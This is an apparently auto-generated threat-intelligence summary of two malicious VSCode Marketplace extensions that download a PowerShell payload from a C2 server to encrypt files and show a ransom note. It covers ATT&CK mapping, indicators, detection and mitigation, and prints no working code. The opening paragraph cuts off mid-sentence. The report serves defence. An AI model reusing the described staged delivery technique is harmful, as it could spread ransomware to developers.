Full Report
Cybersecurity researchers have uncovered two malicious extensions in the Visual Studio Code (VSCode) Marketplace that are designed to deploy ransomware that's under development to its users. The extensions, named "ahban.shiba" and "ahban.cychelloworld," have since been taken down by the marketplace maintainers. Both the extensions, per ReversingLabs, incorporate code that's designed to invoke a
Analysis Summary
# Tool/Technique: ahban.shiba and ahban.cychelloworld VSCode Extensions
## Overview
These are two malicious extensions discovered in the Visual Studio Code (VSCode) Marketplace designed to deploy early-stage ransomware to users' systems. They were quickly removed by marketplace maintainers.
## Technical Details
- Type: Malware / Malicious Tool (VSCode Extension)
- Platform: Windows (Inferred by use of PowerShell and file path target)
- Capabilities: Initial execution via extension activation, downloading and executing a secondary PowerShell payload from a C2 server, file encryption, and displaying a ransom note.
- First Seen: Context implies detection around March 24, 2025.
## MITRE ATT&CK Mapping
The primary actions described map to execution and impact tactics:
- **TA0002 - Execution**
- T1059.001 - Command and Scripting Interpreter: PowerShell
- **TA0040 - Impact**
- T1486 - Data Encrypted for Impact
## Functionality
### Core Capabilities
- Installation via VSCode Marketplace.
- Upon activation, the extension invokes a PowerShell command to retrieve a payload from a Command and Control (C2) server.
- The downloaded payload executes and targets files specifically within the `%USERPROFILE%\Desktop\testShiba` folder for encryption.
- Displays a rudimentary ransom note: "Your files have been encrypted. Pay 1 ShibaCoin to ShibaWallet to recover them."
### Advanced Features
- The described ransomware functionality appears to be in **early-stage development**, indicated by the limited scope of encryption (only the "testShiba" folder) and the lack of actionable recovery instructions (no concrete wallet address or detailed steps).
- Utilizes a staged approach (Extension -> PowerShell download -> Payload execution).
## Indicators of Compromise
- File Hashes: [Not Provided in Context]
- File Names: `ahban.shiba`, `ahban.cychelloworld` (Extension names)
- Registry Keys: [Not Provided in Context]
- Network Indicators: C2 server (URL/IP address is the source for the PowerShell payload).
- Behavioral Indicators: Execution of PowerShell commands initiated by process activity related to the VSCode extension host that result in data encryption confined to the "testShiba" directory on the desktop.
## Associated Threat Actors
- [Not explicitly named, but inferred to be sophisticated enough to publish under fake identities/extensions on the VSCode Marketplace.]
## Detection Methods
- **Signature-based detection:** Signatures for known C2 infrastructure once identified.
- **Behavioral detection:** Monitoring for VSCode extensions executing outbound network connections followed immediately by the invocation of PowerShell to download and run remote scripts, especially targeting user-level directories for encryption.
- **YARA rules:** Could be developed for the obfuscated content of the secondary PowerShell payload.
## Mitigation Strategies
- **Prevention measures:** Thoroughly vet all extensions before installation, especially those with low download counts or unclear authorship, even if hosted on official marketplaces. Review extension permissions on install.
- **Hardening recommendations:** Implement application control policies to restrict scripting engine execution (PowerShell, JScript) where possible, or heavily monitor and restrict its initial processes if launched by non-standard executables.
## Related Tools/Techniques
- **Prior Supply Chain Incidents:** Mention of other malicious extensions masquerading as Zoom and a malicious Maven package impersonating `scribejava-core`.
- **Techniques:** Typosquatting (used by the related Maven package) is a common supply chain initial compromise vector.